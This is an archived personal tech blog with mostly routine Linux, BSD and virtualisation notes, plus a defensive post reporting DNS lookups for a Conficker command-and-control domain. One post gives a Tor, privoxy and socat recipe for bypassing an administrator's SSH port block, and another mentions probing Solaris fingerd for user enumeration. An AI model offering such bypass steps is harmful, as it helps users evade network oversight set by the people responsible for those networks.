The tracker is basically is a ruby code build over dnsruby's and ruby-pcap library for collecting packets and processing the dns packets only. So far, the tracker is working fine except if it receive malformed dns traffic which normally will be discarded by the tracker<br />
</div>
yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com0tag:blogger.com,1999:blog-16641472.post-83803205387231307442009-03-30T00:32:00.000-07:002012-12-05T00:34:15.431-08:00Conficker: The other not so famous Variant A<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="text-align: justify;">
There are lot more discussions are going on for Conficker variant C (ConfickerC) due to 1st April. Why 1st april?. The 1st april is the day ConfickerC should call home for updates. The domain name generator algorithm used by ConfickerC is making blocking or detecting live ConfickerC update servers is becoming harder when it will search for about 50K domains name. . Please refer to SRI excellent write-up for more information about ConfickerC here. MyCERT advisory about ConfickerC is <a href="http://www.mycert.org.my/en/services/advisories/mycert/2009/main/detail/647/index.html" target="_blank">here</a>.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I can’t say much about the current situation but based on my observation on dns traffic we have, we only observed low volume of traffics contacting ConfickerC domains name hosted in .my domain. Maybe because it wasn’t the time yet.(my timeframe of observation was on 27-29 March 09).</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Compare to ConfickerA (variant A), I observed more traffics are looking for the domain name: trafficconverter.biz. Trafficconverter.biz is the server that will be contacted by ConfickerA. Take a look at ConfickerA file sample and we’ll see the domain name. It’s very disturbing to notice that variant A is still out there screaming for their C&C server while alot more discussion have been switching to ConfickerC.</div>
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">....................SNIP ...............SNIP....................<br />....................SNIP ...............SNIP....................<br />Sat Mar 28 17:29:00 +0800 2009 - 202.XXX.YY.132 is looking for trafficconverter.biz.XXX.my<br />Sat Mar 28 16:32:07 +0800 2009 - XXX.60.YY.229 is looking for trafficconverter.biz.XXX.my<br />Sat Mar 28 15:29:41 +0800 2009 - 203.XXX.YY.85 is looking for trafficconverter.biz.XXX.my<br />Sat Mar 28 15:46:26 +0800 2009 - 202.YY.56.XXX is looking for trafficconverter.biz.XXX.my<br />Sat Mar 28 15:15:55 +0800 2009 - 202.XX.XX.229 is looking for trafficconverter.biz.XXX.XXX.my<br />....................SNIP ...............SNIP....................<br />....................SNIP ...............SNIP....................</span><div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
During the timframe ( 27-29 March 09), it is about 1167+ queries to DNS looking for the trafficconverter.biz. it’s still considered a big infection based on DNS traffics query only. Luckily the trafficconverter.biz is no longer running. But, the infected machines is still need to be clean-up.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
MyCERT already released advisory for ConfickerA and also mentioned about tools that can be used to remove the ConfickerA. The advisory is here. If you haven’t patch your MS08-67, please do so.</div>
</div>
yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com0tag:blogger.com,1999:blog-16641472.post-72120073591176368362008-01-08T06:38:00.000-08:002008-12-09T18:10:10.032-08:00[x] OpenSolarisI'm working on something with solaris. Finding old version of solaris like 9 and 8 is come to no hope.:D.Anyway, thank to SUN for releasing new solaris version 10. It's a brand new solaris with a couple of integration with GNU/Free Software project. So, i gave a try to install opensolaris on vmware server. The installation went smoothly. Opensolaris GUI installation need more than 512M of memory, though. Here is the screenshot taken on opensolaris installation. It's nice to see a brand new opensolaris. You can grab the iso for opensolaris from <a href="http://www.sun.com/software/solaris/solaris-express/get.jsp">here</a>. You need to register,though. Once you downloaded 3 iso dvds, you need to unzip and concatenate the files. Here are the steps that u can perform.<br /><br />1. unzip the iso files.<br /> shell>unzip sun-solaris-file-dvd-1.zip<br /> shell>unzip sun-solaris-file-dvd-2.zip<br /> shell>unzip sun-solaris-file-dvd-3.zip<br /><br />2. combine the files<br /> shell>cat sun-solaris-file-dvd-1 sun-solaris-file-dvd-2 sun-solaris-file-dvd-3 > <br /> sun-solaris.iso<br /><br />3.Burn into your dvd or if your're using vmware server for installation, just point the iso option into sun-solaris.iso file.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrORwN55UxL2K9XE_LF9OUmVZm3LmkcHHGtiCcUsVYmx7HD3T5gkeoXKGetig6TyTKXBev7qHvVzQaumW2UkDFq_b8kTga-LNxlu6LF4UxXxM2UUVq180T7ah0nrCSrSa3YE9x/s1600-h/07012008042.jpg"><img style="cursor:pointer; cursor:hand;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrORwN55UxL2K9XE_LF9OUmVZm3LmkcHHGtiCcUsVYmx7HD3T5gkeoXKGetig6TyTKXBev7qHvVzQaumW2UkDFq_b8kTga-LNxlu6LF4UxXxM2UUVq180T7ah0nrCSrSa3YE9x/s320/07012008042.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5153119146904299842" /></a><br /><br />The login screen from opensolaris. It's running on gnome windows manager.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8_7aWBkFVvlQWvP0-RlMDl93GbafS5R9uMFmv_9q4ug9ThoBIpW1HlQbwXWUwmFb_uTGNtLlIo578GikvlwTjvxq_P8fA1fCmUplIVLeYF9YGQji9cJeHqTc_xsKuojnhLQf8/s1600-h/07012008044.jpg"><img style="cursor:pointer; cursor:hand;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8_7aWBkFVvlQWvP0-RlMDl93GbafS5R9uMFmv_9q4ug9ThoBIpW1HlQbwXWUwmFb_uTGNtLlIo578GikvlwTjvxq_P8fA1fCmUplIVLeYF9YGQji9cJeHqTc_xsKuojnhLQf8/s320/07012008044.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5153119589285931346" /></a><br /><br /><br />Still remember those day when solaris 7,8,9 are the main target of 0wning?:X.Once done with the installation, i was try to enable a few legacy services by sun likes telnet, ftp, nfs,finger etc..etc.Argg, did i mention fingerd.?.Solaris implementation on fingerd was a mistake at least on version below than 10. By issuing a finger command to fingerd daemon by using all number for user,fingerd will display all the information regarding user who was logged into system.I'm trying my luck on new version to see either the bug still there or not. Enabling the service is just so easiieeee.:D.It's kind of using ubuntu enable services gui application.:D.hehe.The bug i was looking for is no longer there. Thank God.:D. Anyway, opensolaris is just another OS that i need to learn.yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com0tag:blogger.com,1999:blog-16641472.post-9281701177903266682007-12-25T07:29:00.000-08:002007-12-25T07:43:27.639-08:00hello ubuntuIt's have been a good 2 years of services mr gentoo.i'm very appreciate for all the good and awesome stuff we have been thru'. it's just a time for me to change my mode.Again, Thank a lot. Hello ubuntu.:D. You're just so gorgeous!!.Everything just works started from the beginning until now.:D.i'm a proud user of you,mr ubuntu. The hardware detection just awesome. I'm no longer having problems for connecting on bluetooth,mmc card, hp hw6515 ,nokia n95,etc.etc.It's awesome.<br /><br />i have not blogging for quite sometimes now. Not really busy, but just didn't have mode for blogging. that's the main problem for me.:D.I need to start changing this things.Err, it's started be sounded like a new wish/spirit for new year.gissshhhh. Really, i need to start actively writing on the blog. :D.yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com4tag:blogger.com,1999:blog-16641472.post-78539257557954264202007-05-15T00:42:00.000-07:002007-05-15T01:07:15.488-07:00yearly update?hahaa..it's have been awhile since my last post to this blog.emm, i need to remind myself that i have blog that needs to be updated. yeahh.this blog is dedicated for myself as an online notes about things related to my lifes,works,etc..etc. so just a long update for this post, ohh wait, i'll try to make it short.<br /><br />1.this blog have nothing todo with other ppls, company..etc..etc.it;s my personal thoughts, opinions and views.[disclaimer]<br />2. my previous notebook,acer have been sent over to service center again. this time, my hardisk gone crazy. lucky for me to have frenz which working in forensic stuffs. by using their gadgets, we managed to save almost have of my precious datas,hahah..<br />3.Got a brand new dell xps m1210. this sexy machine is running gentoo linux. yehh..gentoo roxx.:D. no offends to other distros, since i'm using fedora 6 at desktop home pc, debian as my main linux on vmware server, freebsd as my home machine and openbsd as my lame router at home.:D. OSS rulez!!!, that's for sure. since this machine have pre-installed with vista [w0w..w0w], i got a chance to play with it for awhile. maybe because of 'home edition' a few of softwares can't operate and running well on it. nokia pc suite,dap, gaim, vpn client (cisco), thunderbird, open office (to name a few) just can't worked well with my machine. there;re always problems with these software. emm,security features on vista are quite good. kudos to microsoft for trying to create a better OS.:D<br /><br />4.emm, having upgrade for fedora linux from fedora 4 to fedora 6. already took 2 weeks to get completed. demm. just to share a tips. for everytimes we want to upgrade please issue this command:<br />shell>yum clean all<br /><br />please remove old kernels which are no longer needed.<br />shell>yum -y update<br />shell>rpm -qa | grep kernel<br />shell>rpm -e kernel.old.x.x.x.<br />shell>rpm -Uvh http://link.to.latest.fedora.x.x.release.rpm<br />shell>yum clean all<br />shell>yum -y update<br /><br />5.i'm blogging now thru 3G network by using nokia N80 as my moderm.hehe.i'm using the N80 inside windows xp with vmware inside gentoo.hahhaa.crazy huhh..?.i'll provide the simple howto how to enable it. <br /><br />6.i;m now an active irc user but not an active ppl on channel.hehehe. if u see me on any channel, just say hi.:D..<br /><br />7.*sighhh*..thinking of to sign out. hehe..hopefully i will try to update more often after this.:D<br /><br />signing of,<br />y0mudsyomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com0tag:blogger.com,1999:blog-16641472.post-1157963869244986912006-09-10T23:09:00.000-07:002006-09-11T02:09:11.370-07:00bypassing port 22, if and only if your admin closed port 22huh..hav been thru alot of r&d lately. i'm realy didn't get what r&d actually stand in malaysia.it's relex&delay?:D.heh. being someone who spent almost 2 years on r&d, i felt that ways.heh.at least for me.but thanx god, i made my r&d done.huhh.ohh back to the topic. actually, lately i stumbled accross a few things/domain. it;s started with embedded system, security competation,,,bla..bla..bla. for embedded system, i'll leave it for next post.yeahh, hopefully.:D.so, now, back to the topic. by passing blocked ssh port.hehe. some sort of ppls tend to change the default ssh's port from 22 to unblocked port(80,443). it's relatively rare to find admin (if, he does, woww-i'm amazed.:p) to closed port 80 and 443 since these two ports hold responsiblelity to handle http and https traffics. but do you really think, people who provide free ssh services will change the default for our own gud. i dont think so man.so, here is how u can actully by pass the blocked ssh port. what u really need are tor (the onion routing) and privoxy. first things first.<br />-------------------------------howto begin----------------------------------------------------<br /><br />1.install tor. (im using gentoo,arrgg, installation is just demm plain straight forward.go figure for ur distro)<br /><span style="font-style:italic;">shell>emerge -av tor</span><br /><br />2.install privoxy<br /><span style="font-style:italic;">shell>emerge -av privoxy</span><br /><br />3.configure privoxy's config file.<br /><span style="font-style:italic;">shell>vi /etc/privoxy/config</span><br />#things that you should change.<br />#-----------------------------<br />#on line 661<br />listen-address 127.0.0.1:8118<br />#on line 1009<br />forward-socks4a / localhost:9050 .<br />#hehh,watch out the "." at the end of localhost:blalal .<br />#u really need to put that magic "."<br /><br />4.configure tor's config file<br /><span style="font-style:italic;">shell>vi /etc/tor/torrc</span><br />#things that you should change.<br />#-----------------------------<br />#on line 30<br />SocksPort 9050 <br />#online 31<br />SocksListenAddress 127.0.0.1<br />#online 34 <br />ReachableDirAddresses *:80<br />#online 34 <br />ReachableORAddresses *:443<br /><br />5.config ur(ssh luser) ssh's config file<br /><span style="font-style:italic;">shell>vi /home/yomuds/.ssh/config</span><br />#add these line to ur config file<br />Host myillegalssh.org<br />#whatever host u can put here.<br /> ProxyCommand socat - SOCKS4A:localhost:chi.spunge.org:22,socksport=9050<br />#chi.spunge.org just an example. put your real ssh server here<br />#e.g=ProxyCommand socat - SOCKS4A:localhost:myhomessh.no-ip.org,socksport=9050<br /><br />6. run our tor and privoxy services.<br /><span style="font-style:italic;">shell>/etc/init.d/tor start<br /></span><br /><span style="font-style:italic;">shell>/etc/init.d/privoxy start</span><br /><br />7.test our configuration.yey..\0/<br /><span style="font-weight:bold;">before</span><br /><span style="font-style:italic;">yomuds@gentoob0x ~ $ ssh yomuds@chi.spunge.org</span><br />ssh_exchange_identification: Connection closed by remote host<br />demm!!<br /><br><br /><span style="font-weight:bold;">after</span><br /><span style="font-style:italic;">shell>ssh yomuds@myillegalssh.org</span><br />Welcome to Spunge.org. Please log in....<br /><br />yomuds@chi.spunge.org's password:<br />Last login: Mon Sep 4 14:42:52 2006 from static-68-179-33-129.ptr.terago.ca<br />System News -<br /><br />Tadaaa!!!!<br />--------------------------------end howto---------------------------------------<br /><br />this howto should worked if ur admin didn't block tor network.if he did, then we're out of luck.it's happen to me.:(.demm..*update*-i was wrong,our admin didn't block the tor network yet.huhh..legaa!!.:D..\o/yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com3tag:blogger.com,1999:blog-16641472.post-1156096974561663292006-08-20T10:49:00.000-07:002006-08-20T11:02:54.573-07:00gentoo + arch not set..mor0n...--------------------------error start-----------------------------------<br />gentoob0x yomuds # emerge -av dsniff<br /><br />These are the packages that I would merge, in order:<br /><br />!!! ARCH is not set... Are you missing the /etc/make.profile symlink?<br />!!! Is the symlink correct? Is your portage tree complete?<br /><br />-------------------------error end-------------------------------------<br /><br />have you guys having this problem after emerging with --sync option. if you had, here is a solution to overcome this problem.<br /><br /><span style="font-style:italic;">shell> ls -al /etc/make.profile.</span><br />check where is the softlink of /etc/make.profile. if it's pointing to the correct file (/usr/portage/profiles/default-linux/x86/2006.0), then it is shoudn't be the problem. but if it not, you need to re-create the softlink file. remove the current /etc/make.profile first.<br /><br /><span style="font-style:italic;">shell>rm /etc/make.profile<br />shell>ln -s /usr/portage/profiles/default-linux/x86/2006.0 /etc/make.profile<br /></span><br /><br />hope this help.:D.gentoo always had bad surprises for you guys.btw, gentoo roxx!!.:Dyomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com0tag:blogger.com,1999:blog-16641472.post-1155918921540801492006-08-18T09:07:00.000-07:002006-08-18T09:35:21.570-07:00vmware player & qemu : not a perfect match..:Paha, i;m glad for using qemu instead of vmware workstations. anyways, all sort of this is just a metter of personal taste. working in linux env, certain things can be done easily with CLI tools.:D. a few ppls said that to change setting on qemu is quite difficult like to change size of rams, cdrom file, network setting and bla bla bla. if you're using qemu frequently, don't forget the combination keys of "ctrl+alt+2". this combination will help and allow you to manipulate qemu behaviour.:D.trust me, it's so easy to run qemu than vmware player. at least on qemu i didn't need to recompile my new kernel modules.hahaha. just another execuse. anyways, i just done configured and installed a freebsd image using qemu. but, since my fren need to run this image for vmware player, i reformated the image format to vmdk. example on qemu to create vmdk image format:<br /><br />shell> qemu-img create -f vmdk Freebsd.iso 10G <br /><br><br />i was thinking at that memont that there are couldn't be any problems when i boot the image using vmware player. i was wrong, dudes. vmware player only recognized a configuration file with extenstion *.vmx. what?. then, i'm clueless. how could i create that *.vmx file when i didn't even have vmware workstations(no pirated software please). lucky me to know that file *.vmx is only text base file.:D.kewl. then the next thing is to googling around about vmware player config file. i was stumbled to <a href="http://www.consolevision.com/members/dcgrendel/vmxform.html">this</a> site. woww, greate efforts man. thanx noobacide.:D. noobacide's tool is a tool to allow you to manually configure *.vmx file to fit your need.:D. here is my *.vmx config file:<br /><br />----------------begin-------------------------<br />config.version = "8"<br />virtualHW.version = "3"<br /><br />MemAllowAutoScaleDown = "FALSE"<br />MemTrimRate = "-1"<br /><br />uuid.location = "56 4d 5c cc 3d 4a 43 29-55 89 5c 28 1e 7e 06 58"<br />uuid.bios = "56 4d 5c cc 3d 4a 43 29-55 89 5c 28 1e 7e 06 58"<br /><br />uuid.action = "create"<br />checkpoint.vmState = ""<br /><br />displayName = "FreeBSD 6.0"<br />guestOS = "freeBSD"<br />memsize = "256"<br /><br />ethernet0.present = "TRUE"<br />ethernet0.connectionType = "bridged"<br />ethernet0.addressType = "generated"<br />ethernet0.generatedAddress = "00:0c:29:7e:06:58"<br />ethernet0.generatedAddressOffset = "0"<br /><br />usb.present = "TRUE"<br />usb.generic.autoconnect = "TRUE"<br /><br />sound.present = "TRUE"<br />sound.virtualdev = "es1371"<br /><br />scsi0.present = "TRUE"<br />scsi0.virtualdev = "buslogic"<br /><br />scsi0:0.present = "FALSE"<br /><br />scsi0:1.present = "FALSE"<br /><br />floppy0.present = "TRUE"<br />floppy0.fileName = "A"<br />floppy0.startConnected = "FALSE"<br /><br />ide0:0.present = "TRUE"<br />ide0:0.fileName = "FreeBSD-6.0.iso"<br />ide0:0.deviceType = "disk"<br />ide0:0.mode = ""<br />ide0:0.redo = ""<br />ide0:0.writeThrough = "TRUE"<br />ide0:0.startConnected = "TRUE"<br /><br />ide0:1.present = "TRUE"<br />ide0:1.fileName = "cdrom"<br />ide0:1.deviceType = "cdrom-raw"<br />ide0:1.autodetect = "FALSE"<br />ide0:1.startConnected = "FALSE"<br /><br />ide1:0.present = "FALSE"<br /><br />ide1:1.present = "FALSE"<br /><br />----------------end----------------------------------<br /><br />aha, it's quite a lot of works need to done before you can 'freely' using your new image.:D.so, im not gonna use vmware player as long as qemu is still in my hand.:P..nuff said.<br /><br><br />p/s: why i;m always got problems when compiling a brand new kernel?.even with 'make oldconfig' from working kernel.:(.my bads.yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com1tag:blogger.com,1999:blog-16641472.post-1153740187807541682006-07-24T01:35:00.000-07:002006-07-24T05:39:55.163-07:00Open Source CLI downloader -wget - aget roxxit's kinds of uncomfortable for me if i can't download all contents for article im reading because they're chapter-base or section-based. by doing that, the authors tend to forget to create one single html/pdf/or_whatever file. *sigh.don't get me wrong, i'm here wasn't to complain about the authors nor the articles. It's really nice if we only need to save/download a single file rather then a bounch of files with a weird name like "chap01_sec1_titleX_beginner.html".huhh.:D. anyways, back to the post title,yeahh downloader. lucky for us to had downloaders which are can download a whole directory to us. speaking of which CLI downloaders are fit for me, i picked wget and aget. why aget?, simply because wget didn't support simultaneous downloading. here is wget command to download all files inside a directory. We can control to lets wget recursively crawling to only a directory. when you're enable wget to recursively downloading files without controling how far it can crawl, your're in big trouble because wget will get all files inside the website which is we didn't want todo that.<br /><br /><span style="font-style: italic;">shell>wget -r -k -l 1 http://www.example.com/articles/</span><br /><br />-r for recursive<br />-k convert all links to local files<br />-l level of depth wget can crawl.<br /><br /><span style="font-style: italic;">shell >wget -r -k -l 1 http://www.freeos.com/guides/lsst/<br />---------------------------output------------------------------------<br />00:37:59 (1.23 KB/s) - `www.freeos.com/guides/lsst/aboutauth.html' saved [3267/3267]<br /><br />--00:37:59-- http://www.freeos.com/guides/lsst/index.html<br /> => `www.freeos.com/guides/lsst/index.html'<br />Connecting to www.freeos.com|66.98.242.53|:80... connected.<br />HTTP request sent, awaiting response... 200 OK<br />Length: 12,438 (12K) [text/html]<br />--------------------------end-----------------------------------------</span><br /><br /><br />btw, if you want to download bash-scripting tutorial, link i provided is good resource for that. have a nice reading days ahead.<br />opps. im using aget when i want a simultaneous download. you can use aget with this example<br /><br /><span style="font-style: italic;">shell> aget -n 10 http://mirror.oscc.org.my/fedora/core/4/i386/iso/FC4-i386-disc1.iso</span><br /><br />-n how many thread you want to open<br /><br />-happy downloading with open source tools.:p<br /></span>yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com3tag:blogger.com,1999:blog-16641472.post-1152863677908218982006-07-14T00:19:00.000-07:002006-07-14T05:50:37.206-07:00qemu:another problems faded awaytoday, i played with <a href="http://www.fedora.org">fedora core</a> at home which i installed 5-6 months back. the motivations behind this issue becouse i got 192MB sdram from a friend,hafiz.thanx, dude.:D.so, i start to reinstall the ram and test it with my old/ancient pc running fedora core 4.hahh,my bios showed that i just had extra 192MB of ram.hahaha.gud.:D.when my fedora was booting smoothly, i figured out for how long this machine didn't do any sort of update.:D.hehh.<a href="http://www.kernel.org">kernel</a> is still running on default installation which is 2.6.11.x.unstable, current kernel is 2.6.17.4.hahaa.so, i was thinking to update this system.being a streamixless home, i decided to bring this machine to my workplace for upgrading the system.ohh, wait, why not just unplug the hdisk and runing it thru qemu.woow, nice idea. beside that, i bought a new tool called "usb 2.0 to ide cable".nifty tools i told u.i recommand u to have one(u can find it at lowyat).so i can plug my fedora hdisk to the usb cable and i ready to go.:D.qemu even asked me which kernel do i need to pick up upon booting.:D.seem like i gonna use this way to upgrade my two others machines running <a href="http://www.openbsd.org">openBSD</a> 3.8 and <a href="http://www.freebsd.org">freebsd</a> 6.0<br /><br /><span style="font-style: italic;">shell>qemu -hda /dev/sda -m 128 -user-net </span><span class="" style="display: block;" id="formatbar_CreateLink" title="Link" onmouseover="ButtonHoverOn(this);" onmouseout="ButtonHoverOff(this);" onmouseup="" onmousedown="CheckFormatting(event);FormatbarButton('richeditorframe', this, 8);ButtonMouseDown(this);"></span><br /><span class="down" style="display: block;" id="formatbar_Italic" title="Italic" onmouseover="ButtonHoverOn(this);" onmouseout="ButtonHoverOff(this);" onmouseup="" onmousedown="CheckFormatting(event);FormatbarButton('richeditorframe', this, 4);ButtonMouseDown(this);">when, qemu start to booting my fedora core hdisk, i've had countered with simple problem regarding the <a href="http://www.xorg.org">Xorg</a> setting.i fixed up this problem with a new setting for display screen set to 800x600.so, now i'm ready for my upgrading process.here is screenshot for my fedora core updating itself with yum.:D.<br /><div align="center"><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://photos1.blogger.com/blogger/3002/1585/1600/fedora-upgade-qemu0.png"><img style="cursor: pointer;" src="http://photos1.blogger.com/blogger/3002/1585/320/fedora-upgade-qemu0.png" alt="" border="0" /></a><br /><span class="down" style="display: block;" id="formatbar_Italic" title="Italic" onmouseover="ButtonHoverOn(this);" onmouseout="ButtonHoverOff(this);" onmouseup="" onmousedown="CheckFormatting(event);FormatbarButton('richeditorframe', this, 4);ButtonMouseDown(this);"></span></div><br /><br />i had to said that i hate yum so much.:D.hehhe.its freaking slow compare to port/portage system. btw,lucky me to had our malaysian base fedora mirror provided by <a href="http://www.oscc.org.my">oscc</a>. you can check the mirror <a href="http://mirror.oscc.org.my">here. </a>i also had centos4.2 on qemu img to be update, but dont worry, let finish this update first.:D.thanx to brilliant qemu features.<br /><br /><br /><br /></span>yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com1tag:blogger.com,1999:blog-16641472.post-1152267964892183712006-07-07T02:46:00.000-07:002006-07-07T03:26:06.963-07:00OpenBSD: network installation thru qemuyesterday i tried to upgrade my openbsd 3.8 virtual machine running on qemu inside gentoo box. after reading a couples of docs/howto, i'm ready to give my openbsd3.8 an upgrade.goshh!!, cvs port is closed.demm.i had no choice now.since on official openbsd faq/doc recommanded to always install a brand new release with fresh install,i go for it.aha, now, waiting to my notebook done downloading all openbsd files to make iso cd,i getting tired. my stomach cry asking to be feed.:(.so, i decided to just install thru network.so, i just download a file called floopy39.fs. then i create an image file for new openbsd installation.ohh,wait! i need to create a bootable floopy disk first.but i didn't have a floopy drive. thanx to qemu for allowing us to pass any bootable files to be boot. i create an image file for bootable floopy and copy all contents from floopy39.fs into it.<br /><br /><br /><span style="font-style: italic;">root@vm>qemu-img create openbsdfloopy.iso 2M</span><br /><span style="font-style: italic;">root@vm>dd if=floopy39.fs of=openbsdfloopy.iso</span><br /><br /><br />next is to create my installation file for openbsd3.9<br /><br /><br /><span style="font-style: italic;">root@vm>qemu-img create -f qcow openbsd3-9.iso 6G</span><br /><br /><br />then, i fired my qemu up to boot from openbsdfloopy.iso to install openbsd thru network.<br />root@vm>qemu -fda openbsdfloopy.iso -hda openbsd3-9.iso -m 64 -user-net -boot a<br /><br />aha, more quicker actually compare with downloading openbsd files to convert them to iso. when installing openbsd, i picked network installation thru http by using mirror from japan{http://ftp.jp.openbsd.org}.you can read more details on installation openbsd thru openbsd official docs page.:D.nah, i can go for dinner now and just let openbsd finish up for the rest.:D.<br /><br /><br />today, i issued command 'uname -a' on my vm, and i got:<br /><br /><br /><span style="font-weight: bold;">OpenBSD OpenBSD3-9.netbytesec.com 3.9 GENERIC#XXX i386</span><br /><br /><br /><br />ahaa, nice.so, today i just installing a few network tools likes honeyd, snort and etc..etc.upps, i also need fluxbox and rxvt.heh.to ease my daily need.:D.<br />ohh,one more thing.please buy an original cd from www.openbsd.org.:D.i haven't got mine.:(.yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com0tag:blogger.com,1999:blog-16641472.post-1152009145782525652006-07-04T03:04:00.000-07:002006-07-04T03:32:26.480-07:00tcpdump filterthese two weeks back, i was playing alot with network tools. one of the tools is <a href="http://www.tcpdump.org">tcpdump</a> . usually i tend to ignore any sort of tcpdump filters trick. i just fired up my tcpdump with basic option like "-vv -n -s 1515 -x". but this is not a clean options for capturing packets. in this situation, what i plan to do is to avoid any non tcp traffics, traffics flying out thru my nic and to avoid traffics coming from unsuspicious hosts. so here is the tcpdump filter[note to myself,\0/].<br /><br /><br /><shell><span style="font-style: italic;">tcpdump -vv -n -s 1515 -x tcp and 'port !22' and not host 192.168.1.1 and not host 192.168.1.2 </span><br /><br /><br />noticed here that tcpdump using bpf's style on filtering the filters. <span style="font-style: italic;">tcp</span> option is only to capture tcp traffics, <span style="font-style: italic;">not host </span>is an option not to capture traffics coming from this host. in this example, i can avoid capturing traffics from my host 192.168.1.1 and 192.168.1.2. <span style="font-style: italic;">not 'port !22'</span> option to avoid any traffics coming from port 22:ssh. noticed here when using '!' u need to put an quote '' between !.'!' is just another reserved char in tcpdump. so, be careful when using any of tcpdump reserved char. actually, this is a basic command for tcpdump. there are alot of tcpdump tricks and tips out there. the best place to learn more about tcpdump is www.tcpdump.org.<br /><br /><br />at the other hand of network tools i played are scapy, ruby libpcap and rubyforger. huhh, maybe i'll reserved these tools for next post.heh.:Dyomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com0tag:blogger.com,1999:blog-16641472.post-1151483235217386742006-06-28T00:54:00.000-07:002006-06-28T01:29:35.980-07:00first post for the old blog<div style="text-align: justify;">aha. now i started to feel weird again. when you're doing blogging, you're actually communicate with your readers. but, i didn't have the readers not even one. i used to have a blog before and it's still there.somewhere in this big world of internet. so, why im moving to this blogspot?.nah, im tired of fighting with spammers. they're roxx.:D.i don't think that mine blogspot account will be my main blog. it's just temporary i guest.:D. my plan is to have a mock-up blog before i ready to setup for the real one. when the real blog is ready, im moving to the real one.huhh..enuff for the first post. hofefully by the second post i start to blog about technical stuffs. i did love to share.</div>yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com0